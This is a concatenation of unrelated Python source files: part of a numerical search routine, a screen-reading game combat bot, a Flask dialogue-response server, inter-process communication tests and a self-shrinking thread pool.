linear[k] = onebit_rev(cand.prev_move1,k)[k]
scoreup_param = scoreup_param + 1
#for k in range (0,N):
# tryindx = cand.indx + onebit_rev(move_mode(cand.prev_move1,cand.prev_move2),k)
# # print(onebit_rev(cand.prev_move1,k))
# print(tryindx)
# tryx = np.vectorize(convertLists)(tryindx,i,lowerx,upperx)
# res = func(tryx)
# result_label.append([res,onebit_rev(move_mode(cand.prev_move1,cand.prev_move2),k)])
# print(res)
# if res < result_label[0][0]:
# linear[k] = onebit_rev(cand.prev_move1,k)[k]
# scoreup_param = scoreup_param + 1
# print(linear)
if (scoreup_param > 1):
tryindx = cand.indx + linear
tryx = np.vectorize(convertLists)(tryindx,i,lowerx,upperx)
res = func(tryx)
result_label.append([res,linear])
print(linear)
print(tryindx)
print(tryx)
print(res)
result_label.sort(key=itemgetter(0))
cand.indx = cand.indx + linear
cand.value = res
cand.prev_move2 = cand.prev_move1
cand.depth = i + 1
cand.prev_move1 = linear
else:
result_label.sort(key=itemgetter(0))
cand.indx = cand.indx + result_label[0][1]
cand.value = result_label[0][0]
cand.prev_move2 = cand.prev_move1
cand.depth = i + 1
cand.prev_move1 = result_label[0][1]
if (cand.maxvalue > result_label[0][0]):
cand.maxindx = cand.indx
cand.max_value = cand.value
result_label.clear()
def procJob4(func, cand, i, newN, upperx, lowerx,linear,q):
result_label = []
for k in newN:
tryindx = 2*cand.indx + onebit_rev(linear,k)
print(tryindx)
tryx = np.vectorize(convertLists)(tryindx,i,lowerx,upperx)
res = func(tryx)
resArray = onebit_rev(linear,k)
result_label.append([res,resArray])
print(res)
q.put(result_label)
def calcMultiProc4(func, cand, i, N, upperx, lowerx,linear):
listN = [j for j in range(N)]
newNs = getDistedList(listN, nProc)
processes = []; queues = []
for n in range(nProc):
newN = newNs[n]
q = Queue()
p = Process(target=procJob4, args=(func, cand, i, newN, upperx, lowerx,linear, q))
processes.append(p)
queues.append(q)
p.start()
result_label = []
for n in range(nProc):
processes[n].join()
result = queues[n].get()
result_label += result
return [result_label, listN]
def neib_serach_acl(func,Candidates,i,N,upperx,lowerx):
result_label = []
for cand in Candidates:
print(cand.idnum)
scoreup_param = 0
linear = move_mode(cand.prev_move1,cand.prev_move2).copy()
cand.depth = 2*cand.depth
tryindx = 2*cand.indx + linear
tryx = np.vectorize(convertLists)(tryindx,cand.depth,lowerx,upperx)
res = func(tryx)
result_label.append([res,linear])
print(linear)
print(cand.depth)
print(tryindx)
print(tryx)
print(res)
[result_label, kList] = calcMultiProc4(func, cand, cand.depth, N, upperx, lowerx,linear)
for n in range(len(result_label)):
if result_label[n][0] < res:
k = kList[n]
linear[k] = onebit_rev(linear,k)[k]
scoreup_param = scoreup_param + 1
# for k in range (0,N):
# tryindx = 2*cand.indx + onebit_rev(move_mode(cand.prev_move1,cand.prev_move2),k)
# print(onebit_rev(cand.prev_move1,k))
# print(tryindx)
# tryx = np.vectorize(convertLists)(tryindx,i,lowerx,upperx)
# res = func(tryx)
# result_label.append([res,onebit_rev(move_mode(cand.prev_move1,cand.prev_move2),k)])
# print(res)
# if res < result_label[0][0]:
# linear[k] = onebit_rev(move_mode(cand.prev_move1,cand.prev_move2),k)[k]
# scoreup_param = scoreup_param + 1
# print(linear)
if (scoreup_param > 1):
# tryindx = 2*cand.indx + linear
# tryx = np.vectorize(convertLists)(tryindx,i,lowerx,upperx)
# res = func(tryx)
# result_label.append([res,linear])
print(linear)
print(tryindx)
print(tryx)
print(res)
result_label.sort(key=itemgetter(0))
cand.indx = 2*cand.indx + linear
cand.value = res
# cand.depth = i + 1
cand.prev_move2 = cand.prev_move1
cand.prev_move1 = linear
else:
result_label.sort(key=itemgetter(0))
cand.indx = 2*cand.indx + result_label[0][1]
cand.value = result_label[0][0]
# cand.depth = i + 1
cand.prev_move2 = cand.prev_move1
cand.prev_move1 = result_label[0][1]
result_label.clear()
# if ( scoreup_param > 1):
# tryindx = 2*cand.indx + linear
# tryx = np.vectorize(convertLists)(tryindx,i,lowerx,upperx)
# res = func(tryx)
# result_label.append([res,linear])
# print(linear)
# print(tryindx)
# print(tryx)
# print(res)
# result_label.sort(key=itemgetter(0))
# cand.indx = 2*cand.indx + result_label[0][1]
# cand.value = result_label[0][0]
# cand.prev_move2 = cand.prev_move1
# cand.prev_move1 = result_label[0][1]
# result_label.clear()
def pascal(func,upperx,lowerx,depth=20,linearmode_start=11,pattern="all",Cands=1):
global max_value
global max_position
N=len(upperx)
if (N == 0 or N != len(lowerx)):
print ("upper or lower is wrong.")
sys.exit(1)
if os.path.exists(pattern):
try:
f=open(pattern)
except:
print("Pattern file is not exist.")
exit()
x = f.read()
f.close()
lines = [i for i in re.split(r'\n',x) if i != '']
length = len(lines)
lines_cut = []
lines_merge = []
lines_numpy = []
for c_list in lines:#risuto
c_list=c_list[0:N]
lines_cut.append(c_list)
print(c_list)
lines_merge = list(set(lines_cut))
print(lines_merge)
lines_merge.sort()
for c_list in lines_merge:
c_list=list(c_list)
c_list=[int(s) for s in c_list]
num_list=np.array(c_list)
lines_numpy.append(num_list)
else:
sys.exit(1)
Candidates = []
origin =Candidate(idnum=0,indx=np.zeros(N, dtype = int),prev_move1=np.zeros(N, dtype = int),value=0.,prev_move2=np.zeros(N, dtype = int),depth=0,maxindx=np.zeros(N, dtype = int),maxvalue=0.)
Candidates.append(origin)
for i in range(1,depth+1):#kainokaisuu
print ('start')
if (i<linearmode_start):
comb_search(func,Candidates,i,lines_numpy,N,upperx,lowerx,Cands,pattern)
else:
neib_serach(func,Candidates,i,N,upperx,lowerx)
result = []
for cand in Candidates:
max_value.append(cand.value)
max_position.append(np.vectorize(convertLists)(cand.indx,cand.depth,lowerx,upperx))
result.append([cand.value,cand.indx,np.vectorize(convertLists)(cand.indx,cand.depth,lowerx,upperx)])
return result
# return cand.value,np.vectorize(convertLists)(cand.indx,cand.depth,lowerx,upperx)
|
combat_standalone.py
|
# The intent of this test is to verify that a standalone combat bot works
# And then incorporate the working standalone back into the v3 test bot
from hsvfilter import grab_object_preset
from windowcapture import WindowCapture
from vision import Vision
import os
import combo
import threading
import time
import pydirectinput
import math
import cv2 as cv
os.chdir(os.path.dirname(os.path.abspath(__file__)))
class StandaloneCombat():
# Weapon arg options are 2 letter for weapon and then either
# F or U for focused or unfocused
def __init__(self, controller, weapon="MSU", level=1) -> None:
self.controller = controller
# self.nearest_enemy_dist = 1
self.dist_threshold = 125
self.centre_mass_angle = 90
# self.ongoing_combo_count = False
# self.frames_since_combo_detect = 1000
self.dunchk_momentum = 10
self.target_relative_coords = [0, 0]
self.current_player_coords = [0, 0]
self.other_player_rel_coords = [0, 0]
self.enemy_locs = []
self.running = False
self.setup()
# This will decide which class to use
self.weapon = weapon
# This will assign correct skills for level
self.level = level
# This will hold the cooldown times for each skill
self.cooldowns = {"popthis": 1}
# This will track when a key can be next pressed
self.cd_tracker = {"popthis": 1}
# This will be the class to use
self.combos = None
# This will be hold the current keypress queue
self.combo_queue = []
# This method fills out each of the above vars
self.initialise_wep_class()
def setup(self):
# Grab the gamename from the text file
with open("gamename.txt") as f:
gamename = f.readline()
# The next block of code is setup for detecting the section cleared msg
self.sect_clear_filter, sect_clear_custom_rect = grab_object_preset(
object_name="message_section_cleared")
# initialize the WindowCapture class for sect_clear detection
self.sect_clear_wincap = WindowCapture(
gamename, sect_clear_custom_rect)
# initialize the Vision class
self.sect_clear_vision = Vision('SectionCleared67.jpg')
# The next block of code is setup for detecting the combo count
self.combo_count_filter, combo_count_custom_rect = grab_object_preset(
object_name="combo_count")
# initialize the WindowCapture class for combo_count detection
self.combo_count_wincap = WindowCapture(
gamename, combo_count_custom_rect)
# initialize the Vision class
self.combo_count_vision = Vision('combocount67.jpg')
# The next block of code is setup for detecting the current player
self.player_filter, player_custom_rect = grab_object_preset(
object_name="player_map_loc")
# initialize the WindowCapture class for player detection
self.player_wincap = WindowCapture(
gamename, player_custom_rect)
self.player_vision = Vision('playerv2_67.jpg')
# The next block of code is setup for detecting enemies on minimap
# This uses same image as player minimap but dupe it due to error prevent
self.enemy_minimap_filter, enemy_custom_rect = grab_object_preset(
object_name="enemy_map_locv3")
self.enemy_minimap_wincap = WindowCapture(
gamename, enemy_custom_rect)
# initialize the Vision class
self.enemy_minimap_vision = Vision('enemy67.jpg')
# The next block of code is setup for detecting if in a dungeon
self.dunchk_filter, dunchk_custom_rect = grab_object_preset(
object_name="dungeon_check")
self.dunchk_wincap = WindowCapture(
gamename, dunchk_custom_rect)
self.dunchk_vision = Vision('dunchk_67.jpg')
# The next block of code is setup for detecting the other player
self.othr_plyr_filter, othr_plyr_custom_rect = grab_object_preset(
object_name="other_player_map_loc")
self.othr_plyr_wincap = WindowCapture(
gamename, othr_plyr_custom_rect)
self.othr_plyr_vision = Vision('otherplayer67.jpg')
def combat_mainloop(self):
loop_time = time.time()
time.sleep(0.1)
# Need to start the combo
self.start_combo_handler()
while True:
if self.check_if_in_dungeon():
if self.check_for_sect_clear():
self.controller.mode = "movement"
self.controller.combat_cooldown = time.time() + 5
break
if self.dunchk_momentum < 20:
self.dunchk_momentum += 1
if self.check_for_ongoing_combo():
pass
elif self.check_for_enemies():
self.calc_nearest_enemy()
elif self.dunchk_momentum >= 1:
self.dunchk_momentum -= 1
else:
self.controller.mode = "movement"
break
# If loops are over 100fps, slow to 67fps
if 100*(time.time() - loop_time) < 1:
# Minimum sleep time is roughly 15ms regardless
time.sleep(0.001)
loop_time = time.time()
self.running = False
def check_if_in_dungeon(self):
# get an updated image of the game at specified area
dunchk_screenshot = self.dunchk_wincap.get_screenshot()
# pre-process the image to help with detection
dunchk_output_image = self.dunchk_vision.apply_hsv_filter(
dunchk_screenshot, self.dunchk_filter)
# do object detection, this time grab rectangles
dunchk_rectangles = self.dunchk_vision.find(
dunchk_output_image, threshold=0.31, epsilon=0.5)
# then return answer to whether currently in dungeon
if len(dunchk_rectangles) == 1:
return True
return False
def check_for_enemies(self):
minimap_screenshot = self.enemy_minimap_wincap.get_screenshot()
# pre-process the image to help with detection
enemy_output_image = self.enemy_minimap_vision.apply_hsv_filter(
minimap_screenshot, self.enemy_minimap_filter)
# do object detection, this time grab points
enemy_rectangles = self.enemy_minimap_vision.find(
enemy_output_image, threshold=0.61, epsilon=0.5)
# then return answer to whether enemies are detected
if len(enemy_rectangles) >= 1:
# Need to first update the current player location
self.can_find_current_player()
points = self.enemy_minimap_vision.get_click_points(
enemy_rectangles)
# Then translate the points to be relative to the player
points = self.get_relative_to_player(points)
self.enemy_locs = points.copy()
return True
return False
def check_for_sect_clear(self):
# then try to detect the sect_clear
sc_ss = self.sect_clear_wincap.get_screenshot()
# pre-process the image to help with detection
sect_clear_image = self.sect_clear_vision.apply_hsv_filter(
sc_ss, self.sect_clear_filter)
# do object detection, this time grab rectangles
sect_clear_rectangles = self.sect_clear_vision.find(
sect_clear_image, threshold=0.34, epsilon=0.5)
# then return answer to whether sect clear is showing
if len(sect_clear_rectangles) == 1:
return True
return False
def check_for_ongoing_combo(self):
# then try to detect the combo_count
oc_ss = self.combo_count_wincap.get_screenshot()
# pre-process the image to help with detection
combo_count_image = self.combo_count_vision.apply_hsv_filter(
oc_ss, self.combo_count_filter)
# do object detection, this time grab rectangles
combo_count_rectangles = self.combo_count_vision.find(
combo_count_image, threshold=0.21, epsilon=0.5)
# then return answer to whether currently in dungeon
if len(combo_count_rectangles) >= 1:
return True
return False
def calc_nearest_enemy(self):
for x, y in self.enemy_locs:
closest = 1000
if x + y < closest:
closest = x + y
nearestx = x
nearesty = y
self.centre_mass_angle = self.calc_angle(
nearestx, nearesty)
# Then set the "target" enemy
self.target_relative_coords = [nearestx, nearesty]
def calc_angle(self, relx, rely):
angle = math.degrees(math.atan2(rely, relx))
if angle <= 90:
angle = angle * -1 + 90
else:
angle = 360 + (angle-90) * -1
return angle
def can_find_current_player(self):
# Main logic for this method is below
minimap_screenshot = self.player_wincap.get_screenshot()
player_image = self.player_vision.apply_hsv_filter(
minimap_screenshot, self.player_filter)
player_rectangles = self.player_vision.find(
player_image, threshold=0.41, epsilon=0.5)
player_points = self.player_vision.get_click_points(
player_rectangles)
if len(player_points) == 1:
self.current_player_coords[0] = player_points[0][0]
self.current_player_coords[1] = player_points[0][1]
return True
else:
# Should this be set to 0,0 or left as is? Come back to this later
# Will leave as is for now, probably useful for enemy detect
return False
def get_relative_to_player(self, abs_list):
# This will convert the points in a list
# To be relative to the player
playerx = self.current_player_coords[0]
playery = self.current_player_coords[1]
returnlist = []
for x, y in abs_list:
relx = x - playerx
rely = playery - y
returnlist.append([relx, rely])
return returnlist
def point_at_target(self):
if self.centre_mass_angle >= 315 or self.centre_mass_angle < 45:
pydirectinput.keyDown("up")
if self.centre_mass_angle >= 225 and self.centre_mass_angle < 315:
pydirectinput.keyDown("left")
if self.centre_mass_angle >= 135 and self.centre_mass_angle < 225:
pydirectinput.keyDown("down")
if self.centre_mass_angle >= 45 and self.centre_mass_angle < 135:
pydirectinput.keyDown("right")
def start_combo_handler(self):
t = threading.Thread(target=self.combo_handler_MS)
t.start()
def combo_handler(self):
if not self.running:
self.running = True
while self.running:
if len(self.combo_queue) > 0:
key, duration = self.combo_queue[0]
nextkey = None
if len(self.combo_queue) > 1:
nextkey, _ = self.combo_queue[1]
if nextkey == "point":
# Need to point at centre mass of enemies or nearest in range enemy
self.point_at_target()
if key is None:
time.sleep(duration)
elif key == "move":
# Need to calculate time to press buttons in function
# And then press the required buttons
self.move_towards_target()
else:
pydirectinput.keyDown(key)
time.sleep(duration)
pydirectinput.keyUp(key)
time.sleep(0.07)
if nextkey == "point":
for key in ["up", "down", "left", "right"]:
pydirectinput.keyUp(key)
if len(self.combo_queue) > 0:
self.combo_queue.pop(0)
else:
print("Error, tried to pop when array was size 0")
else:
self.combo_queue = self.combos.grab_preferred_combo().copy()
else:
self.combo_queue = []
for key in ["up", "down", "left", "right"]:
pydirectinput.keyUp(key)
def combo_handler_MS(self):
if not self.running:
self.running = True
while self.running:
if len(self.combo_queue) > 0:
key, duration = self.combo_queue[0]
nextkey = None
if len(self.combo_queue) > 1:
nextkey, _ = self.combo_queue[1]
if nextkey == "point":
# Need to point at centre mass of enemies or nearest in range enemy
self.point_at_target()
if key is None:
time.sleep(duration)
elif key == "move":
# Need to calculate time to press buttons in function
# And then press the required buttons
self.move_towards_target()
elif key == "moveplayer":
# Check if can find other player, then move towards
# But only for a specific duration
if self.can_find_other_player():
self.move_towards_other_player(duration)
elif key == "point":
pass
elif key == "x":
pydirectinput.keyDown(key)
time.sleep(duration)
pydirectinput.keyUp(key)
time.sleep(0.07)
elif key in self.cooldowns:
if time.time() > self.cd_tracker[key]:
self.cd_tracker[key] = time.time() + \
self.cooldowns[key]
pydirectinput.keyDown(key)
time.sleep(duration)
pydirectinput.keyUp(key)
time.sleep(0.07)
else:
# Grab the cooldowns of all available keys
# Check if any are ready yet, if yes then go next loop
if self.can_create_preferred_available_order():
pass
# If it isnt move towards the other player if detected
# And keep doing that until the next cooldown is up
elif self.can_find_other_player():
self.move_towards_other_player()
# Or else move opposite direction to enemies but stay in range
else:
self.move_towards_safety()
if nextkey == "point":
for key in ["up", "down", "left", "right"]:
pydirectinput.keyUp(key)
else:
self.combo_queue = self.combos.grab_preferred_combo().copy()
else:
self.combo_queue = []
self.remove_all_keypresses()
def can_create_preferred_available_order(self):
# This will check the current available keys
# And if any are not on cooldown i.e. available to use
# Will create a new order for the combo queue
# Based on the preferred combo order
available = []
for key, cd_time in self.cd_tracker.items():
if time.time > cd_time:
available.append(key)
if len(available) == 0:
return False
else:
self.add_keys_to_queue(available, True)
return True
def add_keys_to_queue(self, available, overwrite=False):
prioritised = []
# First need to sort the keys in order of priority
for key in self.combos.grab_preferred_order():
if key in available:
prioritised.append(key)
# Overwrite if necessary
if overwrite:
self.combo_queue = []
# Then add to combo queue
for key in prioritised:
self.combo_queue.append([key, 0.15])
def move_towards_other_player(self):
# This will move the current character towards the other player
# Usually while waiting for cooldowns
# Then do the movement towards other player
self.move_towards_target(self.other_player_rel_coords)
# If has taken more than enough time then all fine
# Otherwise it will loop again and probably end up
# back here again, not sure if this is an issue or not
def move_towards_safety(self):
# This will attempt to stay within range of average enemy position
# But move away from them to hopefully dodge attacks
# First grab the coords and get opposite
movex = self.target_relative_coords[0]
movey = self.target_relative_coords[1]
abx = abs(movex)
aby = abs(movey)
# Then figure out how far to move to stay within range
ratio = (abx + aby)/self.dist_threshold
# Check if already too far away from target then move closer
if ratio < 1:
# If within range then move back to max range
self.move_towards_target(
[int((-movex/(abx+aby))*self.dist_threshold), int(-movey/(abx+aby)*self.dist_threshold)])
else:
# Move halfway towards the nearest enemy
self.move_towards_target([int(movex/2), int(movey/2)])
def add_move_next_action(self):
# Only grab the first i.e. current action and remove the rest
self.combo_queue = self.combo_queue[:1]
# And then append the instruction to move afterwards
self.combo_queue.append(["move", 2])
def remove_all_keypresses(self):
for key in ["up", "down", "left", "right"]:
pydirectinput.keyUp(key)
for key in ["a", "s", "d", "f", "g", "h"]:
pydirectinput.keyUp(key)
def move_towards_target(self, coords=False):
# Default pixels/sec test move rate was 50pixels in 2.5sec minimap
# Which is 20pixels/sec
if coords:
xdist_to_move = coords[0]
ydist_to_move = coords[1]
else:
xdist_to_move = self.target_relative_coords[0]
ydist_to_move = self.target_relative_coords[1]
if xdist_to_move > 0:
pydirectinput.keyDown("right")
elif xdist_to_move < 0:
pydirectinput.keyDown("left")
if ydist_to_move > 0:
pydirectinput.keyDown("up")
elif ydist_to_move < 0:
pydirectinput.keyDown("down")
# Now hold the buttons until moved to target location
xdist_to_move = abs(xdist_to_move)
ydist_to_move = abs(ydist_to_move)
counter = 0
while self.running:
time.sleep(0.1)
counter += 1
x_remain = xdist_to_move - 2*counter
y_remain = ydist_to_move - 2*counter
if x_remain <= 0:
pydirectinput.keyUp("right")
pydirectinput.keyUp("left")
if y_remain <= 0:
pydirectinput.keyUp("up")
pydirectinput.keyUp("down")
if x_remain <= 0 and y_remain <= 0:
# Releasing keys to catch any bugs or errors here
pydirectinput.keyUp("right")
pydirectinput.keyUp("left")
pydirectinput.keyUp("up")
pydirectinput.keyUp("down")
break
if counter >= 80:
pydirectinput.keyUp("right")
pydirectinput.keyUp("left")
pydirectinput.keyUp("up")
pydirectinput.keyUp("down")
break
def initialise_wep_class(self):
# First create the classes with required information
if self.weapon == "MSU":
self.combos = combo.MSUnfocused(level=self.level)
elif self.weapon == "MSF":
self.combos = combo.MSFocused(level=self.level)
elif self.weapon == "WBU":
self.combos = combo.WeaponBagUnfocused(level=self.level)
elif self.weapon == "WBF":
self.combos = combo.WeaponBagFocused(level=self.level)
# Second figure out which keys to track cooldowns for
for key, value in self.combos.grab_base_cooldowns().items():
if value:
self.cooldowns[key] = value
self.cd_tracker[key] = time.time()
self.cooldowns.pop("popthis")
self.cd_tracker.pop("popthis")
def can_find_other_player(self):
# then try to detect the other player
minimap_screenshot = self.othr_plyr_wincap.get_screenshot()
output_image = self.othr_plyr_vision.apply_hsv_filter(
minimap_screenshot, self.othr_plyr_filter)
# do object detection, this time grab the points
rectangles = self.othr_plyr_vision.find(
output_image, threshold=0.41, epsilon=0.5)
points = self.othr_plyr_vision.get_click_points(rectangles)
if len(points) == 1:
self.other_player_rel_coords[0] = points[0][0] - \
self.current_player_coords[0]
self.other_player_rel_coords[1] = self.current_player_coords[1] - points[0][1]
return True
elif len(points) >= 2:
# Will grab the point closest to the centre of the minimap and track that
# Allowing some small amount of redundancy for short-range following
# In event that the background is also picked up
middle_x = 0
middle_y = 0
dist = 1000
for x, y in points:
if (x+y) < dist:
dist = x+y
middle_x = x
middle_y = y
self.other_player_rel_coords[0] = middle_x - \
self.current_player_coords[0]
self.other_player_rel_coords[1] = self.current_player_coords[1] - middle_y
return True
else:
# Should this be set to 0,0 or left as is? Come back to this later
# Maybe set it to the current player coords instead
# self.other_player_rel_coords = [0, 0]
return False
if __name__ == "__main__":
cs = StandaloneCombat(controller=None)
time.sleep(2)
cs.combat_mainloop()
|
cambot_server.py
|
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import os
import pickle
import time
from queue import PriorityQueue
from threading import Thread
import tensorflow as tf
from convlab.modules.dst.multiwoz.mdbt import MDBTTracker, init_state
from convlab.modules.word_policy.multiwoz.mdrg.predict import loadModel, predict
from flask import Flask, request, jsonify
import convlab
os.environ["CUDA_VISIBLE_DEVICES"] = '0'
_config = tf.ConfigProto()
_config.gpu_options.allow_growth = True
_config.allow_soft_placement = True
start_time = time.time()
rgi_queue = PriorityQueue(maxsize=0)
rgo_queue = PriorityQueue(maxsize=0)
app = Flask(__name__)
@app.route('/', methods=['GET', 'POST'])
def process():
try:
in_request = request.json
except:
return "invalid input: {}".format(in_request)
rgi_queue.put(in_request)
rgi_queue.join()
output = rgo_queue.get()
rgo_queue.task_done()
return jsonify(output)
def generate_response(in_queue, out_queue):
# Response generator
response_model = loadModel(15)
# state tracker
sess = tf.Session(config=_config)
mdbt = MDBTTracker()
saver = tf.train.Saver()
print('\tMDBT: model build time: {:.2f} seconds'.format(time.time() - start_time))
mdbt.restore_model(sess, saver)
prefix = os.path.dirname(convlab.__file__)
dic = pickle.load(open(prefix + '/../data/nrg/mdrg/svdic.pkl', 'rb'))
while True:
# pop input
in_request = in_queue.get()
history = in_request['history']
prev_state = in_request['prev_state']
prev_active_domain = in_request['prev_active_domain']
if prev_state is None:
prev_state = init_state()
state = init_state()
state['history'] = history
try:
mdbt.state = state
state = mdbt.update(sess, "")
except Exception as e:
print('State update error', e)
prev_state = init_state()
prev_active_domain = None
state = init_state()
history = [['null', 'hello']]
state['history'] = history
try:
response, active_domain = predict(response_model, prev_state, prev_active_domain, state, dic)
except Exception as e:
print('Response generation error', e)
response = 'What did you say?'
active_domain = 'null'
# print(response)
out_queue.put({'response': response, 'active_domain': active_domain, 'state': state})
in_queue.task_done()
out_queue.join()
if __name__ == '__main__':
worker = Thread(target=generate_response, args=(rgi_queue, rgo_queue,))
worker.setDaemon(True)
worker.start()
app.run(host='0.0.0.0', port=10002)
|
ipc_tests.py
|
"""
Tests related to inter-process communication (for services).
| Copyright 2017-2021, Voxel51, Inc.
| `voxel51.com <https://voxel51.com/>`_
|
"""
import contextlib
import pickle
import random
import socket
import sys
import threading
import time
import psutil
import pytest
import retrying
from fiftyone.service.ipc import IPCServer, send_request
from fiftyone.service.util import (
find_processes_by_args,
get_listening_tcp_ports,
normalize_wrapper_process,
send_ipc_message,
)
current_process = psutil.Process()
def list_current_ports():
return list(get_listening_tcp_ports(current_process))
@contextlib.contextmanager
def SingleRequestHandler(server):
t = threading.Thread(target=server.handle_request)
t.start()
try:
yield
finally:
server.stop()
t.join()
@contextlib.contextmanager
def MultiRequestHandler(server):
t = threading.Thread(target=server.serve_forever)
t.start()
try:
yield
finally:
server.stop()
t.join()
def test_one_request():
with IPCServer(lambda x: x * 2) as server, SingleRequestHandler(server):
assert send_request(server.port, 5) == 10
def test_multiple_requests():
with IPCServer(lambda x: x * 2) as server, MultiRequestHandler(server):
assert send_request(server.port, 5) == 10
assert send_request(server.port, "a") == "aa"
def test_bad_request():
with IPCServer(lambda _: None) as server, SingleRequestHandler(server):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("localhost", server.port))
s.send(b"foo")
res = pickle.loads(s.recv(2048))
assert isinstance(res, pickle.UnpicklingError)
def test_large_request():
with IPCServer(lambda x: x) as server, SingleRequestHandler(server):
data = list(range(10000))
assert send_request(server.port, data) == data
def test_timeout():
with IPCServer(lambda _: None) as server:
server.timeout = 1
timeout_called = threading.Event()
server.handle_timeout = timeout_called.set
with SingleRequestHandler(server):
time.sleep(server.timeout + 0.5)
assert timeout_called.is_set()
def test_stop_single():
requests = []
with IPCServer(requests.append) as server, SingleRequestHandler(server):
server.timeout = 1
server.stop()
with pytest.raises(socket.error):
send_request(server.port, 5)
assert not requests
def test_stop_multi():
requests = []
with IPCServer(requests.append) as server, MultiRequestHandler(server):
send_request(server.port, 1)
assert requests == [1]
server.stop()
with pytest.raises(socket.error):
send_request(server.port, 2)
assert requests == [1]
def test_run_in_background():
requests = []
with IPCServer.run_in_background(requests.append) as server:
send_request(server.port, 2)
send_request(server.port, 3)
assert requests == [2, 3]
def test_find_processes_by_args():
assert current_process in list(
find_processes_by_args(current_process.cmdline())
)
random_arg = str(5 + random.random())
p = psutil.Popen(
[
sys.executable,
"-c",
"import sys, time; time.sleep(float(sys.argv[1]))",
random_arg,
]
)
@retrying.retry(stop_max_delay=2000)
def _check():
assert normalize_wrapper_process(p) in list(
find_processes_by_args([random_arg])
)
try:
_check()
finally:
p.kill()
def test_get_listening_tcp_ports():
assert not list_current_ports()
with IPCServer(lambda _: None) as server:
assert list_current_ports() == [server.port]
assert not list_current_ports()
def test_send_ipc_message():
with IPCServer.run_in_background(lambda x: x) as server:
assert send_ipc_message(current_process, 6) == 6
with pytest.raises(IOError):
send_ipc_message(current_process, 7)
|
custom_threadpool_executor.py
|
"""
史上最强的python线程池。
最智能的可自动实时调节线程数量的线程池。此线程池和官方concurrent.futures的线程池 是鸭子类关系,所以可以一键替换类名 或者 import as来替换类名。
对比官方线程池,有4个创新功能或改进。
1、主要是不仅能扩大,还可自动缩小(官方内置的ThreadpoolExecutor不具备此功能,此概念是什么意思和目的,可以百度java ThreadpoolExecutor的KeepAliveTime参数的介绍),
例如实例化一个1000线程的线程池,上一分钟疯狂高频率的对线程池submit任务,线程池会扩张到最大线程数量火力全开运行,
但之后的七八个小时平均每分钟只submit一两个任务,官方线程池会一直维持在1000线程,而此线程池会自动缩小,靠什么来识别预测可以自动缩小呢,就是KeepAliveTime。
2、非常节制的开启多线程,例如实例化一个最大100线程数目的pool,每隔2秒submit一个函数任务,而函数每次只需要1秒就能完成,实际上只需要调节增加到1个线程就可以,不需要慢慢增加到100个线程
官方的线程池不够智能,会一直增加到最大线程数目,此线程池则不会。
3、线程池任务的queue队列,修改为有界队列
4、此线程池运行函数出错时候,直接显示线程错误,官方的线程池则不会显示错误,例如函数中写1/0,任然不现实错误。
此实现了submit,还实现future相关的内容,真正的和内置的ThreadpoolExecutor 完全替代。
"""
import os
import atexit
import queue
import sys
import threading
import time
import weakref
from nb_log import LoggerMixin, nb_print, LoggerLevelSetterMixin, LogManager
from concurrent.futures import Executor, Future
from function_scheduling_distributed_framework.concurrent_pool.custom_evenlet_pool_executor import check_evenlet_monkey_patch
from function_scheduling_distributed_framework.concurrent_pool.custom_gevent_pool_executor import check_gevent_monkey_patch
_shutdown = False
_threads_queues = weakref.WeakKeyDictionary()
def check_not_monkey():
if check_gevent_monkey_patch(raise_exc=False):
raise Exception('请不要打gevent包的补丁')
if check_evenlet_monkey_patch(raise_exc=False):
raise Exception('请不要打evenlet包的补丁')
def _python_exit():
global _shutdown
_shutdown = True
items = list(_threads_queues.items())
for t, q in items:
q.put(None)
for t, q in items:
t.join()
atexit.register(_python_exit)
class _WorkItem(LoggerMixin):
def __init__(self, future, fn, args, kwargs):
self.future = future
self.fn = fn
self.args = args
self.kwargs = kwargs
def run(self):
# noinspection PyBroadException
if not self.future.set_running_or_notify_cancel():
return
try:
result = self.fn(*self.args, **self.kwargs)
except BaseException as exc:
self.logger.exception(f'函数 {self.fn.__name__} 中发生错误,错误原因是 {type(exc)} {exc} ')
self.future.set_exception(exc)
# Break a reference cycle with the exception 'exc'
self = None # noqa
else:
self.future.set_result(result)
def __str__(self):
return f'{(self.fn.__name__, self.args, self.kwargs)}'
def set_threadpool_executor_shrinkable(min_works=1, keep_alive_time=10):
ThreadPoolExecutorShrinkAble.MIN_WORKERS = min_works
ThreadPoolExecutorShrinkAble.KEEP_ALIVE_TIME = keep_alive_time
class ThreadPoolExecutorShrinkAble(Executor, LoggerMixin, LoggerLevelSetterMixin):
# 为了和官方自带的THredpoolexecutor保持完全一致的鸭子类,参数设置成死的,不然用户传参了。
# 建议用猴子补丁修改这两个参数,为了保持入参api和内置的concurrent.futures 相同。
# MIN_WORKERS = 5 # 最小值可以设置为0,代表线程池无论多久没有任务最少要保持多少个线程待命。
# KEEP_ALIVE_TIME = 60
MIN_WORKERS = 1
KEEP_ALIVE_TIME = 10
def __init__(self, max_workers=None, thread_name_prefix=''):
"""
最好需要兼容官方concurren.futures.ThreadPoolExecutor 和改版的BoundedThreadPoolExecutor,入参名字和个数保持了一致。
:param max_workers:
:param thread_name_prefix:
"""
self._max_workers = max_workers or 4
self._thread_name_prefix = thread_name_prefix
self.work_queue = self._work_queue = queue.Queue(max_workers)
# self._threads = set()
self._threads = weakref.WeakSet()
self._lock_compute_threads_free_count = threading.Lock()
self.threads_free_count = 0
self._shutdown = False
self._shutdown_lock = threading.Lock()
self.pool_ident = id(self)
def _change_threads_free_count(self, change_num):
with self._lock_compute_threads_free_count:
self.threads_free_count += change_num
def submit(self, func, *args, **kwargs):
with self._shutdown_lock:
if self._shutdown:
raise RuntimeError('不能添加新的任务到线程池')
f = Future()
w = _WorkItem(f, func, args, kwargs)
self.work_queue.put(w)
self._adjust_thread_count()
return f
def _adjust_thread_count(self):
# print(self.threads_free_count, self.MIN_WORKERS, len(self._threads), self._max_workers)
if self.threads_free_count <= self.MIN_WORKERS and len(self._threads) < self._max_workers:
t = _CustomThread(self).set_log_level(self.logger.level)
t.daemon = True
t.start()
self._threads.add(t)
_threads_queues[t] = self._work_queue
def shutdown(self, wait=True): # noqa
with self._shutdown_lock:
self._shutdown = True
self.work_queue.put(None)
if wait:
for t in self._threads:
t.join()
# 两个名字都可以,兼容以前的老名字(中文意思是 自定义线程池),但新名字更能表达意思(可缩小线程池)。
CustomThreadpoolExecutor = CustomThreadPoolExecutor = ThreadPoolExecutorShrinkAble
# noinspection PyProtectedMember
